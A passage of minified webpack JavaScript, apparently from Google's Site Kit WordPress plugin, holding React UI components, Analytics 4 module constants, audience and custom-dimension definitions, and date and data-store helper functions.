9c-5.77 0-10.64 3.725-12.348 8.91"}),o.createElement("path",{fill:"#34A853",d:"m2.25 31.742 7.396-5.67A12.975 12.975 0 0 0 22 35c6.1 0 10.7-3.1 11.8-8.5H22V18h20.5c.3 1.3.5 2.7.5 4 0 14-10 22-21 22A21.94 21.94 0 0 1 2.25 31.742"}),o.createElement("path",{fill:"#4285F4",d:"m36.34 38.52-7.025-5.437c2.297-1.45 3.895-3.685 4.485-6.583H22V18h20.5c.3 1.3.5 2.7.5 4 0 7.17-2.623 12.767-6.66 16.52"}))))},94656:(e,t,i)=>{i.d(t,{A:()=>l});var n=i(47209),o=i(62688),r=i.n(o),s=i(63696),a=i(78325);function Portal({children:e,slug:t}){const[i]=(0,s.useState)(document.createElement("div"));return(0,n.A)(()=>{t&&i.classList.add(`googlesitekit-portal-${t}`);const e=document.querySelector(".googlesitekit-plugin")||document.body;return e.appendChild(i),()=>e.removeChild(i)}),(0,a.createPortal)(e,i)}Portal.propTypes={slug:r().string,children:r().node},Portal.defaultProps={slug:"",children:null};const l=Portal},97345:(e,t,i)=>{i.d(t,{$8:()=>s,$Q:()=>p,BT:()=>E,CQ:()=>v,DF:()=>Q,GM:()=>T,GT:()=>M,HA:()=>P,HD:()=>u,HP:()=>z,J5:()=>B,JF:()=>A,JK:()=>h,Ml:()=>I,SS:()=>_,UF:()=>g,UY:()=>H,Vl:()=>O,W6:()=>V,Xq:()=>D,YQ:()=>S,Yw:()=>G,dV:()=>C,dX:()=>x,ej:()=>c,em:()=>r,ep:()=>k,fu:()=>f,gC:()=>N,hz:()=>m,jx:()=>d,lV:()=>l,nH:()=>L,oR:()=>n,od:()=>a,p3:()=>y,pG:()=>b,qv:()=>o,qy:()=>w,t1:()=>U,t7:()=>Y,tB:()=>j,tK:()=>Z,u_:()=>R});const n="core/user",o="connected_url_mismatch",r="__global",s="temporary_persist_permission_error",a="adblocker_active",l=["weekly","monthly","quarterly"],c="googlesitekit_authenticate",g="googlesitekit_setup",d="googlesitekit_view_dashboard",u="googlesitekit_manage_options",p="googlesitekit_read_shared_module_data",m="googlesitekit_manage_module_sharing_options",I="googlesitekit_delegate_module_sharing_management",h="googlesitekit_update_plugins",y="kmAnalyticsAdSenseTopEarningContent",M="kmAnalyticsEngagedTrafficSource",N="kmAnalyticsLeastEngagingPages",f="kmAnalyticsNewVisitors",j="kmAnalyticsPopularAuthors",k="kmAnalyticsPopularContent",b="kmAnalyticsPopularProducts",x="kmAnalyticsReturningVisitors",T="kmAnalyticsTopCities",v="kmAnalyticsTopCitiesDrivingLeads",D="kmAnalyticsTopCitiesDrivingAddToCart",A="kmAnalyticsTopCitiesDrivingPurchases",S="kmAnalyticsTopDeviceDrivingPurchases",w="kmAnalyticsTopConvertingTrafficSource",C="kmAnalyticsTopCountries",z="kmAnalyticsTopPagesDrivingLeads",E="kmAnalyticsTopRecentTrendingPages",_="kmAnalyticsTopTrafficSource",O="kmAnalyticsTopTrafficSourceDrivingAddToCart",R="kmAnalyticsTopTrafficSourceDrivingLeads",P="kmAnalyticsTopTrafficSourceDrivingPurchases",L="kmAnalyticsPagesPerVisit",B="kmAnalyticsVisitLength",Z="kmAnalyticsTopReturningVisitorPages",Y="kmSearchConsolePopularKeywords",G="kmAnalyticsVisitsPerVisitor",H="kmAnalyticsMostEngagingPages",U="kmAnalyticsTopCategories",V=[y,M,N,f,j,k,b,x,U,T,v,D,A,S,w,C,E,_,O,L,B,Z,G,H,U],Q=[...V,Y]},97513:(e,t,i)=>{i.d(t,{Fo:()=>r,Lg:()=>s,Qb:()=>o,dv:()=>l,mp:()=>a});var n=i(24355);const o="xlarge",r="desktop",s="tablet",a="small";function l(){const e=(0,n.SO)();return e>1280?o:e>960?r:e>600?s:a}}},e=>{e.O(0,[660],()=>{return t=32266,e(e.s=t);var t});e.O()}]);"use strict";(globalThis.__googlesitekit_webpackJsonp=globalThis.__googlesitekit_webpackJsonp||[]).push([[510],{80:(e,i,t)=>{t.d(i,{CV:()=>h,Cu:()=>p,K9:()=>o,Kr:()=>j,Lf:()=>u,Oh:()=>a,PW:()=>E,Rx:()=>L,S9:()=>d,TQ:()=>c,Vt:()=>w,Wl:()=>m,ZC:()=>n,ZY:()=>r,_p:()=>C,ag:()=>N,aj:()=>g,bz:()=>k,dq:()=>f,f2:()=>l,fB:()=>x,fV:()=>A,iB:()=>M,kc:()=>I,mo:()=>y,nc:()=>S,rm:()=>T,to:()=>s,wo:()=>D,yn:()=>z});const o="modules/analytics-4",n="account_create",s="property_create",a="webdatastream_create",r="analyticsSetup",I=10,l=0,M="https://www.googleapis.com/auth/tagmanager.readonly",c="enhanced-measurement-form",g="enhanced-measurement-enabled",u="enhanced-measurement-should-dismiss-activation-banner",N="analyticsAccountCreate",j="analyticsCustomDimensionsCreate",d="https://www.googleapis.com/auth/analytics.edit",D="dashboardAllTrafficWidgetDimensionName",y="dashboardAllTrafficWidgetDimensionColor",z="dashboardAllTrafficWidgetDimensionValue",m="dashboardAllTrafficWidgetActiveRowIndex",T="dashboardAllTrafficWidgetLoaded",p={googlesitekit_post_date:{parameterName:"googlesitekit_post_date",displayName:"WordPress Post Date",description:"Created by Site Kit: Date when a post was published",scope:"EVENT"},googlesitekit_post_author:{parameterName:"googlesitekit_post_author",displayName:"WordPress Post Author",description:"Created by Site Kit: WordPress name of the post author",scope:"EVENT"},googlesitekit_post_categories:{parameterName:"googlesitekit_post_categories",displayName:"WordPress Post Categories",description:"Created by Site Kit: Names of categories assigned to a post",scope:"EVENT"},googlesitekit_post_type:{parameterName:"googlesitekit_post_type",displayName:"WordPress Post Type",description:"Created by Site Kit: Content type of a post",scope:"EVENT"}},S={ADD_TO_CART:"add_to_cart",PURCHASE:"purchase",SUBMIT_LEAD_FORM:"submit_lead_form",GENERATE_LEAD:"generate_lead",CONTACT:"contact"},A=[S.CONTACT,S.GENERATE_LEAD,S.SUBMIT_LEAD_FORM],x={"new-visitors":{description:"People who visited the site for the first time",displayName:"New visitors",membershipDurationDays:-1,filterClauses:[{clauseType:"INCLUDE",simpleFilter:{scope:"AUDIENCE_FILTER_SCOPE_ACROSS_ALL_SESSIONS",filterExpression:{andGroup:{filterExpressions:[{orGroup:{filterExpressions:[{dimensionOrMetricFilter:{fieldName:"newVsReturning",stringFilter:{matchType:"EXACT",value:"new"}}}]}},{orGroup:{filterExpressions:[{notExpression:{dimensionOrMetricFilter:{fieldName:"groupId",stringFilter:{matchType:"EXACT",value:"created_by_googlesitekit:new_visitors"}}}}]}}]}}}}]},"returning-visitors":{description:"People who have visited your site at least once before",displayName:"Returning visitors",membershipDurationDays:-1,filterClauses:[{clauseType:"INCLUDE",simpleFilter:{scope:"AUDIENCE_FILTER_SCOPE_ACROSS_ALL_SESSIONS",filterExpression:{andGroup:{filterExpressions:[{orGroup:{filterExpressions:[{dimensionOrMetricFilter:{fieldName:"newVsReturning",stringFilter:{matchType:"EXACT",value:"returning"}}}]}},{orGroup:{filterExpressions:[{notExpression:{dimensionOrMetricFilter:{fieldName:"groupId",stringFilter:{matchType:"EXACT",value:"created_by_googlesitekit:returning_visitors"}}}}]}}]}}}}]}},E="audiencePermissionsSetup",h="audienceTileCustomDimensionCreate",k="audience-selection-panel-expirable-new-badge-",f="audience",w="customDimension",C="property",L=[f,w,C]},4124:(e,i,t)=>{t.d(i,{A:()=>s});var o=t(20697),n=t(62659);function s(){const e=(0,n.A)();return o.Nn.includes(e)}},4751:(e,i,t)=>{t.d(i,{A:()=>l});var o=t(62688),n=t.n(o),s=t(4452),a=t.n(s),r=t(97513),I=t(62540);function PreviewBlock({className:e,width:i,height:t,shape:o,padding:n,smallWidth:s,smallHeight:l,tabletWidth:M,tabletHeight:c,desktopWidth:g,desktopHeight:u}){const N=(0,r.dv)(),j={width:{[r.mp]:s,[r.Lg]:M,[r.Fo]:g,[r.Qb]:g},height:{[r.mp]:l,[r.Lg]:c,[r.Fo]:u,[r.Qb]:g}};return(0,I.jsx)("div",{className:a()("googlesitekit-preview-block",e,{"googlesitekit-preview-block--padding":n}),style:{width:j.width[N]||i,height:j.height[N]||t},children:(0,I.jsx)("div",{className:a()("googlesitekit-preview-block__wrapper",{"googlesitekit-preview-block__wrapper--circle":"circular"===o})})})}PreviewBlock.propTypes={className:n().string,width:n().string,height:n().string,shape:n().string,padding:n().bool,smallWidth:n().string,smallHeight:n().string,tabletWidth:n().string,tabletHeight:n().string,desktopWidth:n().string,desktopHeight:n().string},PreviewBlock.defaultProps={className:void 0,width:"100px",height:"100px",shape:"square",padding:!1,smallWidth:void 0,smallHeight:void 0,tabletWidth:void 0,tabletHeight:void 0,desktopWidth:void 0,desktopHeight:void 0};const l=PreviewBlock},5855:(e,i,t)=>{t.d(i,{A:()=>M});var o=t(4452),n=t.n(o),s=t(62688),a=t.n(s),r=t(63696),I=t(62540);const l=(0,r.forwardRef)(({label:e,className:i,hasLeftSpacing:t=!1,...o},s)=>(0,I.jsx)("span",{ref:s,...o,className:n()("googlesitekit-badge",i,{"googlesitekit-badge--has-left-spacing":t}),children:e}));l.displayName="Badge",l.propTypes={label:a().string.isRequired,hasLeftSpacing:a().bool};const M=l},6109:(e,i,t)=>{t.d(i,{tt:()=>x,Jg:()=>A,Gp:()=>p,GH:()=>T,r0:()=>S,Du:()=>E,Zf:()=>H,Cn:()=>U,G7:()=>d,vH:()=>j,N_:()=>O,zh:()=>_,mK:()=>M.mK,Ql:()=>h,vY:()=>R,sq:()=>f,VZ:()=>P.VZ,JK:()=>M.JK,IS:()=>C,pH:()=>P.pH,kf:()=>Q,O5:()=>L,Qr:()=>k,x6:()=>G,K5:()=>M.K5,S_:()=>N,dc:()=>P.dc,Eo:()=>M.Eo,jq:()=>M.jq,DK:()=>B.D,N9:()=>Y,p9:()=>s.p,XH:()=>w,Zm:()=>I,sx:()=>n.sx,BI:()=>n.BI,CZ:()=>s.C,BG:()=>W});var o=t(17243),n=t(65054),s=t(50477),a=t(10523),r=t.n(a);function I(e){return r()(JSON.stringify(l(e)))}function l(e){const i={};return Object.keys(e).sort().forEach(t=>{let o=e[t];o&&"object"==typeof o&&!Array.isArray(o)&&(o=l(o)),i[t]=o}),i}var M=t(49746);function c(e){return e.replace(new RegExp("\\[([^\\]]+)\\]\\((https?://[^/]+\\.\\w+/?.*?)\\)","gi"),'<a href="$2" target="_blank" rel="noopener noreferrer">$1</a>')}function g(e){return`<p>${e.replace(/\n{2,}/g,"</p><p>")}</p>`}function u(e){return e.replace(/\n/gi,"<br>")}function N(e){const i=[c,g,u];let t=e;for(const e of i)t=e(t);return t}function j(e){return e=parseFloat(e),isNaN(e)||0===e?[0,0,0,0]:[Math.floor(e/60/60),Math.floor(e/60%60),Math.floor(e%60),Math.floor(1e3*e)-1e3*Math.floor(e)]}function d(e){const i=e&&!Number.isInteger(e)?new Date(e).getTime():e;return isNaN(i)||!i?0:i}var D=t(32091),y=t.n(D),z=t(82871);const m="Date param must construct to a valid date instance or be a valid date instance itself.",T="Invalid dateString parameter, it must be a string.",p='Invalid date range, it must be a string with the format "last-x-days".',S=60,A=60*S,x=24*A,E=7*x;function h(){function e(e){return(0,z.sprintf)(/* translators: %s: number of days */ /* translators: %s: number of days */ (0,z._n)("Last %s day","Last %s days",e,"google-site-kit"),e)}return{"last-7-days":{slug:"last-7-days",label:e(7),days:7},"last-14-days":{slug:"last-14-days",label:e(14),days:14},"last-28-days":{slug:"last-28-days",label:e(28),days:28},"last-90-days":{slug:"last-90-days",label:e(90),days:90}}}function k(e=""){if(!(0,o.isString)(e))return!1;if(3!==e.split("-").length)return!1;const i=new Date(e);return(0,o.isDate)(i)&&!isNaN(i)}function f(e){y()((0,o.isDate)(e)&&!isNaN(e),m);const i=`${e.getMonth()+1}`,t=`${e.getDate()}`;return[e.getFullYear(),i.length<2?`0${i}`:i,t.length<2?`0${t}`:t].join("-")}function w(e){y()(k(e),T);const[i,t,o]=e.split("-");return new Date(i,t-1,o)}function C(e,i){return f(O(e,i*x))}function L(e){const i=e.split("-");return 3===i.length&&"last"===i[0]&&!Number.isNaN(i[1])&&!Number.isNaN(parseFloat(i[1]))&&"days"===i[2]}function O(e,i){y()(k(e)||(0,o.isDate)(e)&&!isNaN(e),T);const t=k(e)?Date.parse(e):e.getTime();return new Date(t-1e3*i)}var b=t(78159),Z=t(38017),v=t(62540);function R(e,i={}){if(Number.isNaN(Number(e)))return"";const{invertColor:t=!1}=i;return(0,b.Ay)((0,v.jsx)(Z.A,{direction:e>0?"up":"down",invertColor:t}))}function U(e,i){return e>0&&i>0?e/i-1:e>0?1:i>0?-1:0}var P=t(48276);function G(e){const i=parseFloat(e)||0;return!!Number.isInteger(i)&&i>0}function Q(e){if("number"==typeof e)return!0;const i=(e||"").toString();return!!i&&!isNaN(i)}function Y(e){return Array.isArray(e)?[...e].sort():e}var B=t(11193);function H(e,i){function t(e){return"0"===e||0===e}if(t(e)&&t(i))return 0;if(t(e)||Number.isNaN(e))return null;const o=(i-e)/e;return Number.isNaN(o)||!Number.isFinite(o)?null:o}function W(e){try{return JSON.parse(e)&&!!e}catch(e){return!1}}function _(e){if(!e)return"";const i=e.replace(/&#(\d+);/g,(e,i)=>String.fromCharCode(i)).replace(/(\\)/g,"");return(0,o.unescape)(i)}},7972:(e,i,t)=>{t.d(i,{F:()=>n,n:()=>o});const o="core/ui",n="activeContextID"},8084:(e,i,t)=>{t.d(i,{$C:()=>h,RF:()=>E,WI:()=>A,_5:()=>T,jU:()=>m,o3:()=>z,x0:()=>S});var o=t(32091),n=t.n(o),s=t(50532),a=t.n(s),r=t(17243),I=t(78913);const l="GET_REGISTRY",M="AWAIT";function c(...e){const i=e.reduce((e,i)=>({...e,...i}),{}),t=p(e.reduce((e,i)=>[...e,...Object.keys(i)],[]));return n()(0===t.length,`collect() cannot accept collections with duplicate keys. Your call to collect() contains the following duplicated functions: ${t.join(", ")}. Check your data stores for duplicates.`),i}const g=c,u=c;function N(...e){const i=[...e];let t;return"function"!=typeof i[0]&&(t=i.shift()),(e=t,o={})=>i.reduce((e,i)=>i(e,o),e)}const j=c,d=c,D=c;function y(e){return e}function z(...e){const i=D(...e.map(e=>e.initialState||{}));return{initialState:i,controls:u(...e.map(e=>e.controls||{})),actions:g(...e.map(e=>e.actions||{})),reducer:N(i,...e.map(e=>e.reducer||y)),resolvers:j(...e.map(e=>e.resolvers||{})),selectors:d(...e.map(e=>e.selectors||{}))}}const m={getRegistry:()=>({payload:{},type:l}),*await(e){return{payload:{value:e},type:M}}},T={[l]:(0,I.b)(e=>()=>e),[M]:({payload:e})=>e.value};function p(e){const i=[],t={};for(let o=0;o<e.length;o++){const n=e[o];t[n]=t[n]>=1?t[n]+1:1,t[n]>1&&i.push(n)}return i}const S={actions:m,controls:T,reducer:y};function A(e){return i=>x(e(i))}const x=a()(e=>(0,r.mapValues)(e,(e,i)=>(...t)=>{const o=e(...t);return n()(void 0!==o,`${i}(...) is not resolved`),o}));function E(e,{negate:i=!1}={}){return{safeSelector:(0,I.N)(t=>(o,...n)=>{const s=!i,a=!!i;try{return e(t,o,...n),s}catch{return a}}),dangerousSelector:(0,I.N)(i=>(t,...o)=>{e(i,t,...o)})}}function h(e,i){return n()("function"==typeof e,"a validator function is required."),n()("function"==typeof i,"an action creator function is required."),n()("Generator"!==e[Symbol.toStringTag]&&"GeneratorFunction"!==e[Symbol.toStringTag],"an action’s validator function must not be a generator."),(...t)=>(e(...t),i(...t))}},8513:(e,i,t)=>{t.d(i,{Kk:()=>s,SZ:()=>o,Yw:()=>a,oJ:()=>r,tT:()=>n});const o="body",n=[o,"display","headline","label","title"],s="small",a="medium",r=[s,a,"large"]},8732:(e,i,t)=>{t.d(i,{$:()=>s,D:()=>n});var o=t(20697);const n="core/notifications",s=[o.uR,o.jU,o.f7,o.Ax,o.Is]},9616:(e,i,t)=>{t.d(i,{A:()=>__WEBPACK_DEFAULT_EXPORT__});const __WEBPACK_DEFAULT_EXPORT__=function(e){if("string"==typeof e&&e.match(/[0-9]{8}/)){const i=e.slice(0,4),t=Number(e.slice(4,6))-1,o=e.slice(6,8);return new Date(i,t.toString(),o)}return!1}},10740:(e,i,t)=>{t.d(i,{$z:()=>n.$,CR:()=>r.C,Cf:()=>I.DialogContent,Es:()=>I.DialogFooter,Nv:()=>o.N,P3:()=>a.P,Si:()=>s.S,fI:()=>M.fI,fh:()=>M.fh,lG:()=>l.a,xA:()=>M.xA});var o=t(91046),n=t(3412),s=t(30454),a=t(26569),r=t(56655),I=t(12786),l=t.n(I),M=t(84984)},11193:(e,i,t)=>{t.d(i,{D:()=>s});var o=t(32091),n=t.n(o);function s(e,{dateRangeLength:i}){n()(Array.isArray(e),"report must be an array to partition."),n()(Number.isInteger(i)&&i>0,"dateRangeLength must be a positive integer.");const t=-1*i;return{currentRange:e.slice(t),compareRange:e.slice(2*t,t)}}},11514:(e,i,t)=>{t.d(i,{X:()=>o});const o="consent-mode-setup-cta-widget"},11999:(e,i,t)=>{t.d(i,{s:()=>o});const o="core/forms"},13137:(e,i,t)=>{t.d(i,{G:()=>l,HY:()=>c,SG:()=>M,db:()=>n,e4:()=>u,vl:()=>g});t(17243);var o=t(82871);const n="missing_required_scopes",s="insufficientPermissions",a="forbidden",r="internal_server_error",I="invalid_json";function l(e){return e?.code===n}function M(e){return[s,a].includes(e?.data?.reason)}function c(e){return!!e?.data?.reconnectURL}function g(e,i){return!(!i?.storeName||M(e)||l(e)||c(e))}function u(e){return e?.code===r?(0,o.__)("There was a critical error on this website while fetching data","google-site-kit"):e?.code===I?(0,o.__)("The server provided an invalid response","google-site-kit"):e?.message}},17443:(e,i,t)=>{t.d(i,{r:()=>AdminScreenTooltip,i:()=>o.i});var o=t(52274),n=t(63696),s=t(50539),a=t(62688),r=t(36703),I=t(40960),l=t(83202),M=t(94656),c=t(71264),g=t(97513),u=t(62540);function JoyrideTooltip(e){const{title:i,content:o,dismissLabel:s,disableOverlay:a=!0,target:N,cta:j=!1,className:d,styles:D={},slug:y="",placement:z="auto",onDismiss:m=()=>{},onView:T=()=>{},onTourStart:p=()=>{},onTourEnd:S=()=>{}}=e;function A(){return!!t.g.document.querySelector(N)}const[x,E]=(0,n.useState)(A),h=(0,g.dv)(),k=h===g.mp||h===g.Lg,[f,w]=(0,n.useState)(!0),C=(0,n.useRef)(k);if((0,I.A)(()=>{A()&&E(!0)},x?null:250),(0,n.useEffect)(()=>{let e=()=>{};if("function"==typeof t.g.ResizeObserver){const i=t.g.document.querySelector(N);if(i){const o=new ResizeObserver(()=>{t.g.dispatchEvent(new Event("resize"))});o.observe(i),e=()=>o.disconnect()}}return e},[N,x]),(0,n.useEffect)(()=>{let e;return C.current!==k&&(w(!1),e=setTimeout(()=>{w(!0)},50),C.current=k),()=>{e&&clearTimeout(e)}},[k]),!x)return null;const L=[{title:i,target:N,content:o,disableBeacon:!0,isFixed:!0,placement:z,cta:j,className:d}],O={close:s,last:s};return(0,u.jsx)(M.A,{slug:y,children:(0,u.jsx)(r.Ay,{callback:function({type:e}){switch(e){case r.qY.TOUR_START:p(),t.g.document.body.classList.add("googlesitekit-showing-tooltip");break;case r.qY.TOUR_END:S(),t.g.document.body.classList.remove("googlesitekit-showing-tooltip");break;case r.qY.STEP_AFTER:m();break;case r.qY.TOOLTIP:T()}},disableOverlay:a,spotlightPadding:0,floaterProps:c.ei,locale:O,steps:L,styles:{...c.R0,...D,options:{...c.R0.options,...D?.options},spotlight:{...c.R0.spotlight,...D?.spotlight}},tooltipComponent:l.A,run:f,disableScrolling:!0})})}JoyrideTooltip.propTypes={title:a.PropTypes.node,content:a.PropTypes.string,disableOverlay:a.PropTypes.bool,dismissLabel:a.PropTypes.string,target:a.PropTypes.string.isRequired,onDismiss:a.PropTypes.func,onShow:a.PropTypes.func,className:a.PropTypes.string,styles:a.PropTypes.object,slug:a.PropTypes.string,placement:a.PropTypes.string,onView:a.PropTypes.func};var N=t(7972),j=t(6109),d=t(62659);function AdminScreenTooltip(){const e=(0,d.A)(),{setValue:i}=(0,s.useDispatch)(N.n),t=(0,g.dv)(),{isTooltipVisible:o=!1,target:a,placement:r,className:I,tooltipSlug:l,title:M,content:c,dismissLabel:D}=(0,s.useSelect)(e=>e(N.n).getValue("admin-screen-tooltip")||{isTooltipVisible:!1});const y=(0,n.useCallback)(()=>{l&&(0,j.sx)(`${e}_${l}`,"tooltip_dismiss"),i("admin-screen-tooltip",void 0)},[i,l,e]);if(!o)return null;const z=t===g.mp||t===g.Lg,m=null!=a?a:'#adminmenu [href*="page=googlesitekit-settings"]',T=null!=r?r:"right";return(0,u.jsx)(JoyrideTooltip,{target:z?"body":m,placement:z?"center":T,className:z?"googlesitekit-tour-tooltip__modal_step":I||(a?void 0:"googlesitekit-tour-tooltip__fixed-settings-tooltip"),disableOverlay:!z,slug:"admin-screen-tooltip",title:M,content:c,dismissLabel:D,onView:function(){(0,j.sx)(`${e}_${l}`,"tooltip_view")},onDismiss:y})}},19484:(e,i,t)=>{async function o(e){const i=e.reduce((e,i)=>{const t=parseInt(i.priority,10);return e[t]=e[t]||[],e[t].push(i.check().then(e=>({task:i,result:!!e})).catch(()=>({result:!1}))),e},{}),t=Object.keys(i).sort((e,i)=>e-i);for(const e of t){let t=[...i[e]];do{const e=await Promise.race(t);if(e.result)return e.task;for(const e in t){const i=t[e];await n(i)&&!1===(await i).result&&delete t[e]}t=t.filter(e=>e)}while(t.length)}return null}async function n(e){const i="SECRETVALUETHATNOPROMISESHOULDEVERRESOLVETO";return e instanceof Promise||(e=Promise.resolve(e)),i!==await Promise.race([e,Promise.resolve(i)])}function s(...e){return async function(...i){for(const t of e)if(!1===await t(...i))return!1;return!0}}function a(...e){return async function(...i){for(const t of e)if(!0===await t(...i))return!0;return!1}}function r(e,i){return async function(...t){return e===await i(...t)}}t.d(i,{ko:()=>r,nr:()=>s,y6:()=>a,zl:()=>o})},19793:(e,i,t)=>{t.d(i,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var o,n=t(63696);function s(){return s=Object.assign?Object.assign.bind():function(e){for(var i=1;i<arguments.length;i++){var t=arguments[i];for(var o in t)({}).hasOwnProperty.call(t,o)&&(e[o]=t[o])}return e},s.apply(null,arguments)}const __WEBPACK_DEFAULT_EXPORT__=e=>n.createElement("svg",s({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},e),o||(o=n.createElement("path",{fill:"currentColor",fillRule:"evenodd",d:"M12 1C5.925 1 1 5.925 1 12s4.925 11 11 11 11-4.925 11-11S18.075 1 12 1m4.806 8.592.592-.806-1.612-1.184-.592.806-3.89 5.296c-.166.226-.36.296-.512.296s-.346-.07-.512-.296l-1.474-2.007-.592-.806-1.612 1.184.592.806 1.474 2.007C9.191 15.6 9.971 16 10.792 16s1.6-.4 2.124-1.112z",clipRule:"evenodd"})))},19826:(e,i,t)=>{t.d(i,{Ay:()=>a,Kq:()=>s});const o=(0,t(63696).createContext)(""),{Consumer:n,Provider:s}=o,a=o},20697:(e,i,t)=>{t.d(i,{Ax:()=>s,CZ:()=>M,Ej:()=>S,Gw:()=>A,Is:()=>a,KK:()=>g,Nn:()=>E,OT:()=>T,SH:()=>m,Y$:()=>u,ZS:()=>r,bg:()=>d,en:()=>p,ep:()=>j,f7:()=>n,hi:()=>N,jU:()=>o,k$:()=>y,kz:()=>x,ly:()=>I,mo:()=>D,s3:()=>z,uR:()=>l,zx:()=>c});const o="mainDashboard",n="entityDashboard",s="mainDashboardViewOnly",a="entityDashboardViewOnly",r="userInput",I="activation",l="splash",M="adminBar",c="adminBarViewOnly",g="settings",u="adBlockingRecovery",N="wpDashboard",j="wpDashboardViewOnly",d="moduleSetup",D="metricSelection",y="wpBlockEditor",z="keyMetricsSetup",m="key-metrics",T="traffic",p="content",S="speed",A="monetization",x=[o,n,s,a,r,l,g,d,D],E=[s,a,c,j]},22942:(e,i,t)=>{t.d(i,{A_:()=>M,DF:()=>g,L1:()=>u,M0:()=>a,Mc:()=>r,Ok:()=>l,U9:()=>I,iW:()=>s,ue:()=>n,wq:()=>o,xR:()=>c});const o=1,n=2,s=3,a="enhanced-measurement-activation-banner-tooltip-state",r="enhanced-measurement-activation-banner-dismissed-item",I="_r.explorerCard..selmet",l="_r.explorerCard..seldim",M="_r..dataFilters",c="_r..nav",g="key-metrics-connect-ga4-cta-widget",u="analytics-4"},24355:(e,i,t)=>{t.d(i,{SO:()=>r});var o=t(55620),n=t(99123);function s(){return[t.g.innerWidth,t.g.innerHeight]}function a({fps:e=60,leading:i=!1,initialWidth:t=0,initialHeight:a=0}={}){const[r,I]=(0,o._)("undefined"==typeof document?[t,a]:s,e,i);function l(){return I(s)}return(0,n.A)(window,"resize",l),(0,n.A)(window,"orientationchange",l),r}function r(e={}){return a(e)[0]}},25427:(e,i,t)=>{t.d(i,{G4:()=>l,Ig:()=>s,Q3:()=>I,a2:()=>a,wA:()=>r});var o=t(17243),n=t(73730);function s(e){function i(e){return"string"==typeof e&&/^[a-zA-Z0-9_]+$/.test(e)}if("string"==typeof e){return e.split(",").every(i)}return(0,n.cX)(e,e=>{const t=e.hasOwnProperty("name")&&i(e.name);if(!e.hasOwnProperty("expression"))return t;const o="string"==typeof e.expression;return t&&o},i)}function a(e){return(0,n.cX)(e,e=>e.hasOwnProperty("name")&&"string"==typeof e.name)}function r(e){const i=["string"];return Object.keys(e).every(t=>{if(i.includes(typeof e[t]))return!0;if(Array.isArray(e[t]))return e[t].every(e=>i.includes(typeof e));if((0,o.isPlainObject)(e[t])){const i=Object.keys(e[t]);return!!i.includes("filterType")&&!("emptyFilter"!==e[t].filterType&&!i.includes("value"))}return!1})}function I(e){const i=["string"],t=["numericFilter","betweenFilter"];return Object.values(e).every(e=>{if(i.includes(typeof e))return!0;if(Array.isArray(e))return e.every(e=>i.includes(typeof e));if(!(0,o.isPlainObject)(e))return!1;const{filterType:n,value:s,fromValue:a,toValue:r}=e;if(n&&!t.includes(n))return!1;const I=Object.keys(e);return n&&"numericFilter"!==n?"betweenFilter"===n&&(I.includes("fromValue")&&I.includes("toValue")&&[a,r].every(e=>!(0,o.isPlainObject)(e)||"int64Value"in e)):I.includes("operation")&&I.includes("value")&&(!(0,o.isPlainObject)(s)||"int64Value"in s)})}function l(e){return!!Array.isArray(e)&&e.every(e=>!!(0,o.isPlainObject)(e)&&((!e.hasOwnProperty("desc")||"boolean"==typeof e.desc)&&(e.metric?!e.dimension&&"string"==typeof e.metric?.metricName:!!e.dimension&&"string"==typeof e.dimension?.dimensionName)))}},25797:(e,i,t)=>{t.d(i,{A:()=>z});var o,n=t(62688),s=t.n(n),a=t(4452),r=t.n(a),I=t(63696),l=t(19793);function M(){return M=Object.assign?Object.assign.bind():function(e){for(var i=1;i<arguments.length;i++){var t=arguments[i];for(var o in t)({}).hasOwnProperty.call(t,o)&&(e[o]=t[o])}return e},M.apply(null,arguments)}const warning_notice=e=>I.createElement("svg",M({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},e),o||(o=I.createElement("path",{fill:"currentColor",d:"M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1m0 14a1.5 1.5 0 1 0 0 3 1.5 1.5 0 0 0 0-3m-1-2h2V6h-2z"})));var c=t(42343),g=t(76984),u=t(62540);const N={[g.Q.NEW]:c.A,[g.Q.SUCCESS]:l.A,[g.Q.INFO]:warning_notice,[g.Q.WARNING]:warning_notice,[g.Q.ERROR]:warning_notice};function Icon({type:e}){const i=N[e]||warning_notice;return(0,u.jsx)(i,{width:24,height:24})}function Title({className:e,children:i}){return(0,u.jsx)("p",{className:r()("googlesitekit-notice__title",e),children:i})}function Description({className:e,children:i}){return(0,u.jsx)("p",{className:r()("googlesitekit-notice__description",e),children:i})}Icon.propTypes={type:s().oneOf(Object.values(g.Q))},Title.propTypes={className:s().string,children:s().node},Description.propTypes={className:s().string,children:s().node};var j=t(49383),d=t(83366);function CTAButton({label:e,disabled:i,inProgress:t,onClick:o,href:n,external:s=!1,hideExternalIndicator:a=!1}){let I;return s&&!a&&(I=(0,u.jsx)(d.A,{width:14,height:14})),(0,u.jsx)(j.SpinnerButton,{className:r()("googlesitekit-notice__cta",{"googlesitekit-notice__cta--spinner__running":t}),disabled:i,isSaving:t,onClick:o,href:n,target:s?"_blank":void 0,trailingIcon:I,children:e})}CTAButton.propTypes={label:s().string.isRequired,disabled:s().bool,inProgress:s().bool,onClick:s().func,href:s().string,external:s().bool,hideExternalIndicator:s().bool};var D=t(82871);function DismissButton({label:e=(0,D.__)("Got it","google-site-kit"),onClick:i,disabled:t}){return(0,u.jsx)(j.Button,{onClick:i,disabled:t,tertiary:!0,children:e})}DismissButton.propTypes={label:s().string,onClick:s().func.isRequired,disabled:s().bool};const y=(0,I.forwardRef)(({className:e,title:i,description:t,dismissButton:o,ctaButton:n,type:s=g.Q.INFO,children:a,hideIcon:I},l)=>(0,u.jsxs)("div",{ref:l,className:r()("googlesitekit-notice",`googlesitekit-notice--${s}`,e),children:[!I&&(0,u.jsx)("div",{className:"googlesitekit-notice__icon",children:(0,u.jsx)(Icon,{type:s})}),(0,u.jsxs)("div",{className:"googlesitekit-notice__content",children:[i&&(0,u.jsx)(Title,{children:i}),t&&(0,u.jsx)(Description,{children:t})]}),(o?.label||o?.onClick||n?.label&&(n?.onClick||n?.href)||a)&&(0,u.jsxs)("div",{className:"googlesitekit-notice__action",children:[a,(o?.label||o?.onClick)&&(0,u.jsx)(DismissButton,{label:o.label,onClick:o.onClick,disabled:o.disabled}),n?.label&&(n?.onClick||n?.href)&&(0,u.jsx)(CTAButton,{label:n.label,onClick:n.onClick,inProgress:n.inProgress,disabled:n.disabled,href:n.href,external:n.external,hi